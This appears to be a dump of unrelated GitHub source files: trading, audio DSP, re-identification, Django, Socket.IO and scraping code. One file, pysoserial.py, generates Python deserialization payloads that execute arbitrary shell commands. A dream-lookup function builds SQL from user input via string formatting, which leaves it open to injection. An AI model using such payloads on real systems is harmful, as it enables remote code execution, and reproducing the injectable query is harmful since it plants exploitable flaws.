{cisla} a su to {pole1} , počet samohlasiek je: {samohlasky} a su to {pole2} , počet spoluhlasiek je: {spoluhlasky} a su to {pole3} , počet ostatnych znakov je: {ostatne} a su to {pole4}\")","repo_name":"richardo-en/High-school-graduation-from-IT","sub_path":"Graduation/20. otázka- Veta.py","file_name":"20. otázka- Veta.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27013002114","text":"\r\n# Choosing the asset\r\npair = 0\r\n\r\n# Time Frame\r\nhorizon = 'H1'\r\nlookback = 14\r\nupper_barrier = 70\r\nlower_barrier = 30\r\nwidth = 40\r\n\r\n# Importing the asset as an array\r\nmy_data = mass_import(pair, horizon)\r\n\r\n# Calling the indicator\r\nmy_data = rsi(my_data, lookback, 3, 4)\r\nmy_data = double_top_bottom(my_data, 4, lower_barrier, upper_barrier, width, 5, 6)\r\n\r\n# Charting the latest signals\r\nsignal_chart_indicator_plot(my_data, 0, 4, 5, 6, barriers = True, window = 500)\r\n\r\n# Performance\r\nmy_data = performance(my_data, 0, 5, 6, 7, 8, 9)\r\n\r\n\r\n","repo_name":"sofienkaabar/Contrarian-Trading-Strategies","sub_path":"Part 4 - Strategies/CT_Strat_11.py","file_name":"CT_Strat_11.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"32"} +{"seq_id":"12187774767","text":"import sqlite3\n\n\ndef cevap(gelen):\n gelen = gelen.lower() # küçük harf yapıyoruz\n gelendizi = gelen.split(\",\") # virgüllere göre rüya terimlerini ayırıyoruz\n cumle=\"\"\n vt = sqlite3.connect(\"ruyatabiri.db\")\n imlec = vt.cursor()\n for terim in gelendizi:\n cekilenveri = imlec.execute(\"\"\"SELECT baslik,icerik FROM tabir WHERE baslik like \"% {}%\" \"\"\".format(terim))\n veriler = cekilenveri.fetchall()\n for veri in veriler:\n cumle+=veri[1]+\"\\n\" \n \n return cumle\n\n\n","repo_name":"ruya-tabiri/ruya-tabiri-telegram-botu","sub_path":"cevapuret.py","file_name":"cevapuret.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9961509161","text":"import numpy as np\nfrom scipy.io import wavfile\n\n\"\"\"\nSound Processing Lab - A simple DSP-application where the user can:\n1) Upload a sound file\n2) Apply a chorus, delay or distortion filter according to customizable settings.\n3) Download a new sound file of the filtered audio.\n\nVersion last edited: 4 september 2022.\nContact: david.larsson-holmgren@hotmail.com\n\"\"\"\n\nclass Sound_file():\n \"\"\"\n A class for sound file objects, storing data and meta data of uploaded sound files.\n \"\"\"\n def __init__(self, data, sf):\n \"\"\"\n A sound file-object constructor.\n :param data: The sound data of the sound file.\n :param sf: The sample frequency of the sound file.\n \"\"\"\n self.data = data\n self.sf = sf\n self.filter = None\n self.filter_params = dict()\n self.file_name = None\n\n def __str__(self):\n \"\"\"\n Displaying meta data attributes of the sound file object.\n :return: Return a printed string of the size of the data array and the sample frequency.\n \"\"\"\n return \"Pre-filtered file name: {}\\\n \\nData size: {}\\\n \\nSample frequency: {}\\\n \\nFilter applied: {}\\\n \\nFilter parameters: {}\"\\\n .format(self.file_name, self.data.size, self.sf, self.filter, self.filter_params)\n\n\n\"\"\"\n ~~~~~~~~~~~~~~~~~~~ THE FILTER FUNCTIONS ~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\ndef chorus(X):\n \"\"\"\n A chorus filter with the delayed signal variating according to a sine wave.\n :param X: A sound object\n :return filt_obj: Returning the sound object of the output signal.\n \"\"\"\n # The filter parameters, available for custom setting.\n alpha = 0.25 # The amplification of the input signal, preferred interval [0, 1]\n beta = 0.25 # The amplification of delayed signal, preferred interval [0, 1]\n fi = 0.1 # Modulation depth, preferred interval [0, 1]\n f = 0.25 # The modulation frequency. For flanger effect.\n t = 50 # Average time delay in ms. For more of an flanger effect, try 10 ms.\n\n # Saving filter parameters in dict.\n settings = {\"alpha\": alpha, \"beta\": beta, \"fi\": fi, \"f\": f, \"t\": t}\n\n D = int((t*10**(-3))*X.sf) # Calculating the average time delay t in samples.\n Y = np.zeros(X.data.shape) # Creating the output signal array.\n X_norm = normalize(X.data) # Normalizing the input signal.\n\n # Processing the normalized input signal X_norm\n for n in range(X_norm.shape[0]):\n # Calculating the index of the delayed signal according to a sine wave variation.\n delayed_index = int(D*(1+fi*np.sin(2*np.pi*f/X.sf*n))) \n if n - delayed_index < 0: # Avoiding negative indices.\n Y[n] = alpha*X_norm[n]\n else: # Adding the chorus signal depending on the variating delayed_index.\n Y[n] = alpha*X_norm[n] + beta*X_norm[n - delayed_index]\n\n # creating new filtered sound object, same sf as original.\n filt_obj = create_sound_file_object(Y, X.sf)\n filt_obj.filter = \"chorus\" # saving which effect was added\n filt_obj.filter_params = settings # saving the settings of the filter parameters.\n\n return filt_obj\n\n\ndef delay(X):\n \"\"\"\n A delay filter with added feedback.\n :param X: A sound object\n :return filt_obj: Returning the sound object of the output signal.\n \"\"\"\n \n # The filter parameters, available for custom setting.\n alpha = 0.4 # The amplification of the delayed input signal, preferred interval [0, 1]\n beta = 0.15 # The amplification of the feedback signal, preferred interval [0, 1]\n t = 430 # Average time delay in ms.\n\n # Saving filter parameters in dict.\n settings = {\"alpha\": alpha, \"beta\": beta, \"t\": t} \n\n D = int((t*10**(-3))*X.sf) # Calculating the average time delay t in samples.\n D2 = int(D*2) # Calculating the average time delay for the feedback signal.\n Y = np.zeros(X.data.size) # Creating the output signal array.\n\n X_norm = normalize(X.data) # Normalizing the input signal.\n\n # Processing the input signal\n for n in range(X_norm.shape[0]):\n if n-D2 < 0: # Avioding negative indicies.\n Y[n] = X_norm[n]\n else: # Adding the delays to the output signal.\n Y[n] = X_norm[n] + alpha*X_norm[n-D] + beta*Y[n-D2]\n\n # creating new filtered sound object, same sf as original.\n filt_obj = create_sound_file_object(Y, X.sf)\n filt_obj.filter = \"delay\" # saving which effect was added\n filt_obj.filter_params = settings # saving the parameters settings made.\n\n return filt_obj\n\ndef distortion(X):\n \"\"\"\n A cubic distortion filter.\n :param X: A sound object\n :return filt_obj: Returning the sound object of the output signal.\n \"\"\"\n\n # The filter parameter, available for custom setting. \n dist_coef = 0.2 # Distortion coefficient for the distortion, interval (0, 1]. \n # Values closer to 0 gives more distortion, vice versa.\n\n # Saving filter parameters in dict.\n settings = {\"dist_coef\": dist_coef} \n\n X_norm = normalize(X.data) # Normalizing the input signal.\n Y = np.zeros(X.data.shape) # Creating the output signal array.\n\n # Processing the output signal\n for n in range(X_norm.shape[0]):\n # Clipping all values above the distortion coefficient.\n if X_norm[n] < - dist_coef:\n Y[n] = - dist_coef\n # Clipping all values below the distortion coefficient.\n elif X_norm[n] > dist_coef:\n Y[n] = dist_coef\n else:\n # Passing the other values according to the original input signal.\n Y[n] = X_norm[n]\n\n # creating new filtered sound object, same sf as original.\n filt_obj = create_sound_file_object(Y, X.sf)\n filt_obj.filter = \"distortion\" # saving which effect was added\n filt_obj.filter_params = settings # saving the parameters settings made.\n \n return filt_obj\n\n\n\"\"\"\n ~~~~~~~~~~~~~~~~~~~ OTHER FUNCTIONS ~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\ndef get_file_name():\n \"\"\"\n A function letting the user enter the file name to be processed.\n Error handling is implemented to handle wrong file name and format.\n :return: Sampling frequency (sf), the data of the sound file, file name. \n \"\"\"\n # Message for input\n message = \"\\nPlease enter the name of the wav-file you want to process:\\n\"\n \n # Description of accepted input of the user.\n help_message = \"\\nImportant:\\n* Don't use parentheses.\\\n \\n* Only wav-format is allowed.\\\n \\n* If your wav-file is located in another folder, don't forget to add the pathname.\\\n (e.g. /Users/username/Music/sound.wav)\\n\"\n \n # Messages if error should occur.\n error_message_1 = \"\\nThe file name you have entered does not exist. Please try again.\\n\"\n # An enter name input.\n error_message_2 = \"\\nWrong file format. Only WAV-files are accepted.\\\n Please try another file.\\n\"\n enter_name = \"\\nPlease enter file name: \"\n\n # boolean value controlling the while loop of the error handling\n valid=False\n while not valid:\n # Displays instructions for the user to input file name.\n file_name = input(message+help_message+enter_name)\n # Try to to read sound file.\n try:\n sf, sound_data = wavfile.read(file_name)\n # if file not found, new specifed instructions are given.\n # letting the user try again\n except FileNotFoundError:\n message = error_message_1\n # If wrong format is given by user, new specifed instructions are given.\n # letting the user try again\n except ValueError:\n message = error_message_2\n else:\n # When correct file name and is provided by the user\n # the sample frequency, sound data and file name is returned\n return sf, sound_data, file_name\n\n\ndef get_integer():\n \"\"\"\n A function taking input from user, asking a integer in the range of [1, 3].\n Error handling is implemented for avoiding incorrect input.\n :return: The integer chosen by the user in the range of [1, 3].\n \"\"\"\n # descriptive messages given to the user\n message = \"\\nPlease choose one of the following sound effects (1, 2 or 3):\"\n alternatives = \"\\n1 Chorus\\n2 Delay\\n3 Distortion\\n\"\n your_choice = \"\\nYour choice: \"\n error_message = \"\\nIncorrect choice.\\nPlease choose 1, 2 or 3:\"\n \n # boolean value controlling the while loop of the error handling\n valid=False\n while not valid:\n # the user providing input based on given instructions\n int_choice = input(message+alternatives+your_choice)\n try:\n # testing if given input is a integer\n int_choice = int(int_choice)\n # if value error, changing the input message to error message\n except ValueError:\n message = error_message\n else:\n # if integer is given but outside the range of [1, 3]\n valid = 0 < int_choice < 4\n if not valid:\n # changing message to input message to error message\n message = error_message\n else:\n # return a correct given user in the range of [1, 3]\n return int_choice\n\n\ndef create_sound_file_object(sound_data, sf):\n \"\"\"\n Returning a sound file object.\n :param sound_data: The data of the sound file.\n :param sf: The sample frequency of the sound file.\n :return: Returning the object.\n \"\"\"\n return Sound_file(sound_data, sf)\n\n\ndef create_new_file_name(sound_obj):\n \"\"\"\n Creating a new file name for the filtered sound, based on the previous file name,\n the filter applied and the settings of the filter.\n :param sound_obj: A sound object.\n :return: A new file name for the filtered sound file.\n \"\"\"\n # Adding the previous file name to the new file name string. Removing \".wav\"\n # adding \"_\" for readibility.\n file_name = sound_obj.file_name[:len(sound_obj.file_name)-4]+\"_\"\n # Adding a \"(\"-symbol for the filter settings.\n file_name += sound_obj.filter+\"(\"\n # A for-loop adding the settings of the filter to the new file name,\n # using the filter parameter-attribute of the particular sound object.\n for i in sound_obj.filter_params.keys():\n file_name += i+\"_\"+str(sound_obj.filter_params[i])+\"_\"\n # Ending the the filname with end \")\"-symbol and the .wav format.\n file_name+=\").wav\"\n\n return file_name\n\n\ndef write_new_sound_file(sound_obj):\n \"\"\"\n Creating a file name and writing a new sound file for the new filtered sound.\n :param sound_file: A sound file object.\n \"\"\"\n # Noramlizing the sound data to avoid clipping.\n norm_sound = normalize(sound_obj.data)\n print(\"Creating new file name...\")\n # Creating a new file name based on the filter and the fitler parameters (settings)\n file_name = create_new_file_name(sound_obj)\n print(\"New file complete.\")\n print(\"Creating new sound file...\")\n # Writing the new sound fil, wav-format.\n wavfile.write(file_name, sound_obj.sf, norm_sound)\n # Feedback for the user that the sound file is created and its name.\n print('\\nYour processed sound file \"' + file_name +' is now created.')\n\n\ndef normalize(X):\n \"\"\"\n Normalizes input array x according to the value of x with the highest amplitude.\n :param X: Input numpy array.\n :return: Returning a new normalized version of X.\n \"\"\"\n return X/np.max(np.abs(X))\n\n\ndef sound_processing(int_choice, sound_obj):\n \"\"\"\n A function processing the sound by calling the different filter functions based\n on user integer input.\n :param int_choice: The integer choice of [1, 3] received by the user.\n :param sound_obj: A sound object.\n :return: Returning the sound object of the filtered sound.\n \"\"\"\n # A variable with placeholder value, prepared for the filtered sound oubject\n filt_obj = None # TEST!!\n print(\"\\nProcessing sound...\")\n # Calling the different filter functions depending on the choice of the user.\n if int_choice == 1:\n filt_obj = chorus(sound_obj)\n if int_choice == 2:\n filt_obj = delay(sound_obj)\n if int_choice == 3:\n filt_obj = distortion(sound_obj)\n print(\"Processing completed.\")\n return filt_obj # Returning the sound object of the filtered sound.\n\n\ndef welcome_message():\n \"\"\"\n Printing simple welcome string.\n :return: Returning a welcome message.\n \"\"\"\n return print(\"\\nWelcome to Sound Processing Lab!\")\n\n\ndef end_message():\n \"\"\"\n A final message before exiting. Instructing the user to restart the program to\n process more files.\n :return: A string of instructions.\n \"\"\"\n return print(\"\\nThank you for using Sound Processing Lab. \\\n \\nTo process another file, please restart.\\\n \\nIf not, have a great day!\\n\")\n \n\ndef main():\n \"\"\"\n The main function from which the program is running.\n \"\"\"\n welcome_message()\n # Receiving the sample frequency, sound data and file name\n sf, sound_data, file_name = get_file_name()\n # creating the sound object for storing meta data of the sound.\n sound_obj = create_sound_file_object(sound_data, sf)\n # Getting input form user which filter is to be applies to the sound.\n int_choice = get_integer()\n # processing the sound based on user input of filter.\n filt_obj = sound_processing(int_choice, sound_obj)\n # saving previous file name to new filtered soudn object\n filt_obj.file_name = file_name\n # writing new sound file\n write_new_sound_file(filt_obj)\n end_message()\n\nmain()\n","repo_name":"nidatelaho/sound_processing_lab","sub_path":"sound_processing_lab.py","file_name":"sound_processing_lab.py","file_ext":"py","file_size_in_byte":13529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34120157059","text":"from torchreid.engine import ImageSoftmaxEngine\nimport numpy as np\n\nclass ImageSoftmaxEngineSeveralSeq(ImageSoftmaxEngine):\n \"\"\"We just modify torchreid's ImageSoftmaxEngine slightly so that it also reports\n avg mAP and rank-1 across all test datasets (MOTS video sequences in our case).\n \"\"\"\n def test(\n self,\n dist_metric='euclidean',\n normalize_feature=False,\n visrank=False,\n visrank_topk=10,\n save_dir='',\n use_metric_cuhk03=False,\n ranks=[1, 5, 10, 20],\n rerank=False\n ):\n r\"\"\"Tests model on target datasets.\n .. note::\n This function has been called in ``run()``.\n .. note::\n The test pipeline implemented in this function suits both image- and\n video-reid. In general, a subclass of Engine only needs to re-implement\n ``extract_features()`` and ``parse_data_for_eval()`` (most of the time),\n but not a must. Please refer to the source code for more details.\n \"\"\"\n self.set_model_mode('eval')\n targets = list(self.test_loader.keys())\n \n rank1s = []\n mAPs = []\n for name in targets:\n domain = 'source' if name in self.datamanager.sources else 'target'\n print('##### Evaluating {} ({}) #####'.format(name, domain))\n query_loader = self.test_loader[name]['query']\n gallery_loader = self.test_loader[name]['gallery']\n rank1, mAP = self._evaluate(\n dataset_name=name,\n query_loader=query_loader,\n gallery_loader=gallery_loader,\n dist_metric=dist_metric,\n normalize_feature=normalize_feature,\n visrank=visrank,\n visrank_topk=visrank_topk,\n save_dir=save_dir,\n use_metric_cuhk03=use_metric_cuhk03,\n ranks=ranks,\n rerank=rerank\n )\n\n if self.writer is not None:\n self.writer.add_scalar(f'Test/{name}/rank1', rank1, self.epoch)\n self.writer.add_scalar(f'Test/{name}/mAP', mAP, self.epoch)\n \n rank1s.append(rank1)\n mAPs.append(mAP)\n\n avg_mAP = np.mean(np.array(mAPs))\n avg_rank1 = np.mean(np.array(rank1s))\n print('** OVERALL Results **')\n print('OVERALL mAP: {:.1%}'.format(avg_mAP))\n print('OVERALL Rank-1: {:.1%}'.format(avg_rank1))\n if self.writer is not None:\n self.writer.add_scalar(f'Test/OVERALL/rank1', avg_rank1, self.epoch)\n self.writer.add_scalar(f'Test/OVERALL/mAP', avg_mAP, self.epoch)\n\n return rank1\n","repo_name":"dvl-tum/motsynth-baselines","sub_path":"src/reid/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"32973891574","text":"from django.shortcuts import render\nfrom django.http.response import JsonResponse, HttpResponseRedirect\nimport blog.tool as tool\nimport blog.models as models\n\n\ndef person_info(request):\n head = tool.getOnlineUser(request)\n return render(request, 'person_info.html',\n {\n 'title': head['user_name'] + '的个人主页',\n 'head': head,\n 'user_name': head['user_name'],\n 'user_head': head['user_head'],\n 'introduce': head['introduce'],\n 'inPersonInfo': True\n })\n\n\ndef person_complain(request):\n user_id = request.COOKIES.get('user_id')\n if user_id is None: return JsonResponse({'result': False})\n complains = models.complaint.objects.filter(user_id=user_id)\n data = {'list': tool.getComplaintData(complains)}\n return JsonResponse(data)\n\n\ndef person_collection(request):\n user_id = request.COOKIES.get('user_id')\n if user_id is None: return JsonResponse({'result': False})\n complains = models.collection_complaint.objects.filter(user_id=user_id)\n complaint_list = []\n for e in complains:\n complaint_list.append(e.collected_complaint_id)\n data = {'list': tool.getComplaintData(complaint_list)}\n return JsonResponse(data)\n\n\ndef person_reply(request):\n user_id = request.COOKIES.get('user_id')\n if user_id is None: return JsonResponse({'result': False})\n comment = models.comment.objects.filter(user_id=user_id)\n data = {'list': []}\n for e2 in comment:\n e = e2.complaint_id\n item = {\n 'id': e.id,\n 'title': e.title,\n 'content': e.content,\n 'user_name': e.user_id.username,\n 'pic': tool.getPicPath(e.pic), # 第一张图\n 'reply_amount': e.reply_amount,\n 'reply_content': e2.content\n }\n data['list'].append(item)\n return JsonResponse(data)\n\n\ndef person_edit(request):\n head = tool.getOnlineUser(request)\n return render(request, 'person_change.html', {\n 'title': head['user_name'] + '的信息',\n 'head': head,\n 'user_name': head['user_name'],\n 'user_head': head['user_head'],\n 'email': head['email'] if head['email'] else '',\n 'introduce': head['introduce'],\n 'real_name': head['real_name'],\n 'inPersonInfo': True\n })\n\n\ndef person_change(request):\n user_head = request.FILES.get(\"new_head\", None)\n email = request.POST.get('email')\n real_name = request.POST.get('real_name')\n introduce = request.POST.get('introduce')\n name = tool.savePic(user_head)\n user_id = request.COOKIES.get('user_id')\n if user_id is None: return JsonResponse({'result': False})\n user = models.user.objects.get(id=user_id)\n\n user.email = email\n if name: user.user_head = name\n if user.introduce != introduce:\n user.introduce = introduce\n if user.real_name != real_name:\n user.real_name = real_name\n user.save()\n return HttpResponseRedirect('person_info')\n","repo_name":"llxapxr/blog_project","sub_path":"blog/person_info.py","file_name":"person_info.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28638268016","text":"from django.shortcuts import redirect, render, reverse, Http404\nfrom django.http import HttpResponse\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.views.generic import CreateView, ListView, DeleteView, UpdateView, DetailView\nfrom django.contrib.auth.models import Group\nfrom django.db.models import Q\nfrom django.core.exceptions import PermissionDenied\nfrom users.models import Reporter, DepartmentHead, QualityDepartment\nfrom userrole.permissions import CheckPermissionCreateMixin, CheckPermissionUpdateMixin, CheckPermissionListMixin, \\\n CheckPermissionDeleteMixin, CheckPermissionDetailMixin\nfrom .forms import ReporterSignupForm, DepartmentSignupForm, QdSignupForm\nfrom .mixins import ReporterMixin, DepartmentMixin, QdMixin\n\n\nclass ReporterCreateView( ReporterMixin, CreateView):\n template_name = 'reporter_form.html'\n\n def get(self, request, *args, **kwargs):\n form = ReporterSignupForm()\n return render(request, self.template_name, {'form': form})\n\n def post(self, request, *args, **kwargs):\n form = ReporterSignupForm(data=request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n user.is_staff = True\n user.save()\n user.groups.add(Group.objects.get(name='Reporter'))\n\n first_name = form.cleaned_data['first_name']\n middle_name = form.cleaned_data['middle_name']\n last_name = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n gender = form.cleaned_data['gender']\n phone = form.cleaned_data['phone']\n address = form.cleaned_data['address']\n signature = form.cleaned_data['signature']\n Reporter.objects.create(user=user, first_name=first_name, middle_name=middle_name,\n last_name=last_name, email=email, gender=gender, phone=phone,\n address=address, signature = signature\n )\n return redirect('/admin')\n\n return render(request, self.template_name, {'form': form})","repo_name":"AashishGrg/User-Role","sub_path":"jpack/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34724201944","text":"#!/usr/bin/env python3\n\nfrom argparse import ArgumentParser\nfrom base64 import b64encode\nimport pickle\nimport jsonpickle\nimport yaml\n\n\nclass Pysoserial:\n def __init__(self, serializer: str, library: str, plaintext: bool) -> None:\n self.serializer = serializer\n self.library = library\n self.plaintext = plaintext\n\n def generate(self, payload: str) -> str:\n class Rce:\n def __init__(self, library: str, command: str) -> None:\n self.library = library\n self.command = command\n\n def __reduce__(self):\n if self.library == 'os':\n import os\n return os.system, (f\"/bin/sh -c '{self.command}'\",)\n import subprocess\n # Use call method instead of Popen to be able to determine elapsed time\n return subprocess.call, (('/bin/sh', '-c', self.command), 0)\n\n pickled = b''\n rce = Rce(self.library, payload)\n if self.serializer == 'pickle':\n pickled = pickle.dumps(rce, protocol=0)\n elif self.serializer == 'json':\n pickled = jsonpickle.encode(rce).encode()\n elif self.serializer == 'yaml':\n # Note that in yaml >= 5.4 (https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf):\n # \"Only class type objects are allowed to deserialize which are present in the script or imported in the script.\"\n # Yoy may want to use subprocess.Popen or other classes in that case.\n pickled = yaml.dump(rce).encode()\n\n if self.plaintext:\n return pickled.decode()\n return b64encode(pickled).decode()\n\n\ndef main() -> None:\n # PARSER\n parser = ArgumentParser('pysoserial.py')\n parser.add_argument('-p', '--payload', required=True, help='payload to execute')\n parser.add_argument('-l', '--library', required=True,\n choices=['os', 'subprocess'], help='library to execute the payload with')\n parser.add_argument('-s', '--serializer', required=True,\n choices=['pickle', 'json', 'yaml'],\n help='serializer to generate the payload for')\n parser.add_argument('--plaintext', default=False, action=\"store_true\",\n help='print result in plain text (default is base64)')\n # END PARSER\n\n args = parser.parse_args()\n pysoserial = Pysoserial(args.serializer, args.library, args.plaintext)\n output = pysoserial.generate(args.payload)\n print(output)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"itasahobby/pysoserial","sub_path":"pysoserial.py","file_name":"pysoserial.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33437954233","text":"class EntityAligner:\n \"\"\"This class aligns the start and end characters of entities with a given tokenization.\n\n In general, entity recognition methods do not know about token borders and thus do not always align with the tokenization.\n The purpose of this class is to align the entities with the nearest larger token border, and to set the entities start and\n end token indices.\n \"\"\"\n\n def __init__(self):\n self._char_to_token_idx = {}\n\n def align_entities_with_tokens(self, ents, tokens):\n \"\"\"Alter the given entity objects to match the nearest larger token start and end char, and set their start and end\n token indices.\n\n :param ents: a list of NamedEntity objects\n :param tokens: a list of token objects\n \"\"\"\n self._compute_char_to_token_idx_lookup(tokens)\n self._set_tokens_in_entities(ents)\n\n def _set_tokens_in_entities(self, ents):\n \"\"\"Set the start and end token indices in the given entities.\n\n Note, that this may also alter the entities start and end characters.\n \"\"\"\n for ent in ents:\n self._set_start_tok(ent)\n self._set_end_tok(ent)\n\n def _set_start_tok(self, ent):\n \"\"\"Recursive function to align the start of the entity with the nearest token border.\"\"\"\n try:\n ent.start_tok = self._char_to_token_idx[ent.start_char]\n except KeyError:\n # search for the nearest larger token border\n ent.start_char -= 1\n self._set_start_tok(ent)\n\n def _set_end_tok(self, ent):\n \"\"\"Recursive function to align the end of the entity with the nearest token border.\"\"\"\n try:\n # take the last character in the entity to get the token index and to create a slice take the next token\n ent.end_tok = self._char_to_token_idx[ent.end_char - 1] + 1\n except KeyError:\n # search for the nearest larger token border\n ent.end_char += 1\n self._set_end_tok(ent)\n\n def _compute_char_to_token_idx_lookup(self, tokens):\n \"\"\"Computes a lookup table, that maps the first and last character of each token to its index in the document.\"\"\"\n self._char_to_token_idx = {}\n\n char = 0\n for idx, token in enumerate(tokens):\n token_len = len(token.text)\n self._char_to_token_idx[char] = idx # first character in token\n self._char_to_token_idx[char + token_len - 1] = idx # last character in token\n\n char += token_len\n if token.has_ws:\n char += 1\n","repo_name":"openredact/nerwhal","sub_path":"nerwhal/entity_aligner.py","file_name":"entity_aligner.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"32"} +{"seq_id":"18811611755","text":"import socketio\n\nimport config as CONFIG\n\nfrom MyCustomNamespace import MyCustomNamespace\n\n# Just to read the queryParameters\nfrom urllib.parse import parse_qs\n\ngroupConfigManager = CONFIG.groupConfigManager\n\n# creates a new Async Socket IO Server\nsio = socketio.AsyncServer(async_mode='aiohttp', cors_allowed_origins='*')\n\ndef init(web_application):\n # Binds our Socket.IO server to our Web Application instance\n sio.attach(web_application)\n\n sio.userCount = 0 # helps UI to pick avatar & name colors\n\n for namespaceObj in groupConfigManager.namespaces:\n customNameSpaceObject = MyCustomNamespace(namespaceObj.endPoint, sio)\n sio.register_namespace(customNameSpaceObject)\n\n@sio.event(namespace='/')\nasync def connect(sid, environ):\n await saveUserNameIfExists(sid, environ)\n print(' 001 ## connecting to default namespace', sid, await sio.get_session(sid))\n await sio.emit(CONFIG.EVENT['NS_INFO_LIST'],\n groupConfigManager.namespaceBaseInfoList,\n room=sid)\n\n@sio.event(namespace='/')\nasync def disconnect(sid):\n print(' 999 ## disconnecting from default namespace ', sid, await sio.get_session(sid))\n\n@sio.event(namespace='/')\nasync def message(sid, data):\n session = await sio.get_session(sid)\n print('message from ', session['username'])\n print('By the way why is someone sending message to default namespace !!')\n\nasync def saveUserNameIfExists(sid, environ):\n # print('------ ', environ['QUERY_STRING'])\n queryDict = parse_qs(environ['QUERY_STRING'])\n if \"username\" in queryDict:\n userNameArray = queryDict[\"username\"]\n if userNameArray != None and len(userNameArray) > 0:\n sio.userCount += 1\n userName = userNameArray[0]\n sessionData = {\n 'userName': userName,\n 'userId': sio.userCount,\n 'sid': sid\n }\n # print('=== ====', sessionData)\n await sio.save_session(sid, sessionData)\n","repo_name":"ChrisDunamis/Chat-Application","sub_path":"Slack Clone/py-back-end/socket_impl.py","file_name":"socket_impl.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16453490598","text":"# -*- coding:utf-8 -*-\n\nimport requests as Req\nfrom bs4 import BeautifulSoup as BSoup\nimport re as Re\nimport matplotlib.pyplot as Plt\nimport jieba as Jb\nfrom wordcloud import WordCloud as WCloud\nfrom wordcloud import ImageColorGenerator as ImgCG\nfrom PIL import Image\nimport numpy as Np\n\nURL = 'http://www.gov.cn/zhuanti/2018lh/2018zfgzbg/zfgzbg.htm'\n\n#connect to URL\nURLObj = Req.get(URL)\nURLObj.encoding = 'utf-8'\nstrData = URLObj.text\n\n#myData = Re.findall(r'

(.*?)

',strData,Re.S | Re.M)\n#print(myData)\n\nmySoup = BSoup(strData,\"html.parser\")\nSData = mySoup.find_all('p')\n\nlstData = []\n\nfor p in SData:\n if len(p) == 0:\n continue\n else:\n lstData.append(p.string)\n\nProData = [str for str in lstData if str not in ['',' ',None]]\n\nprint(ProData)\n\nTData = ''.join(ProData)\n\nJbText = Jb.lcut(TData)\nJbDict = \"/\".join(JbText)\n#print(JbDict)\n\nmyImg = Plt.imread(r'd:\\resource\\timg11.jpg')\n\nmyWordCloud = WCloud(font_path=r\"D:\\resource\\FZXKTJW.ttf\", \n background_color='white',max_font_size=100,max_words=2000,\n mask = myImg)\nmyWordCloud.generate(JbDict)\n\nmyImg_color = ImgCG(myImg)\nmyWordCloud.recolor(color_func = myImg_color)\n\nmyWordCloud.to_file(r\"D:\\resource\\Wcdemo.png\")\n\nPlt.figure(\"词云图\",figsize=(8,6))\nPlt.imshow(myWordCloud)\nPlt.axis(\"off\")\nPlt.show()\n\n\n\n","repo_name":"lib-hfut/lib-hfut","sub_path":"Python玩转大数据_9900066X/Python玩转大数据资料 宣善立(2019)/Python课堂演示文档/WordCloud.py","file_name":"WordCloud.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":357,"dataset":"github-code","pt":"32"} +{"seq_id":"23037176736","text":"import requests\nimport os\nfrom bs4 import BeautifulSoup\nimport re\nimport pickle\nimport json\n\n# We are going to scrape craiglists for a link to all\n# CL state links\ndef link_state(overwrite=False):\n\t# Set initial directory and files info\n\tdata_dir = \"data/\"\n\tdir_files = os.listdir(data_dir)\n\tstart = 'https://sfbay.craigslist.org/'\n\tpattern = re.compile('[\\W_]+')\n\tfn = pattern.sub('', start) + '.html'\n\n\t# Download if not already downloaded, otherwise pull from cache\n\tif fn in dir_files and not overwrite:\n\t\tprint(\"Loading file: \" + fn)\n\t\twith open(data_dir + fn, 'r', encoding='utf-8') as f:\n\t\t\thtml = f.read()\n\telse:\n\t\tprint(\"Downloading: \" + fn)\n\t\tprint(start)\n\t\tres = requests.get(start)\n\t\tif res.status_code == 200:\n\t\t\thtml = res.text\n\t\t\twith open('test', 'w', encoding='utf-8') as f:\n\t\t\t\tf.write(html)\n\n\t\telse:\n\t\t\tprint(\"Couldn't grab, error:\", res.status_code)\n\n\tsoup = BeautifulSoup(html, 'lxml')\n\tstate_link = {}\n\n\tfor element in soup.select('ul.acitem'):\n\t\tif 'alabama' in element.text:\n\t\t\tstates = element\n\t\t\ttags = states.find_all('a', href=True)\n\t\t\tfor t in tags:\n\t\t\t\tlink = 'https:' + t['href']\n\t\t\t\tstate = str(t.text)\n\t\t\t\tif 'more' in state:\n\t\t\t\t\tcontinue\n\t\t\t\tstate_link[state] = link\n\n\treturn state_link\n\ndef link_city(state, state_dic, overwrite=False):\n\t'''Given a state, and a dict that links state name to CL url, find all city links\n\twithin that state'''\n\t\n\t# Set initial directory and files info\n\tdata_dir = \"data/\"\n\tdir_files = os.listdir(data_dir)\n\tpattern = re.compile('[\\W_]+')\n\n\t# Download if not already downloaded, otherwise pull from cache\n\tlink = 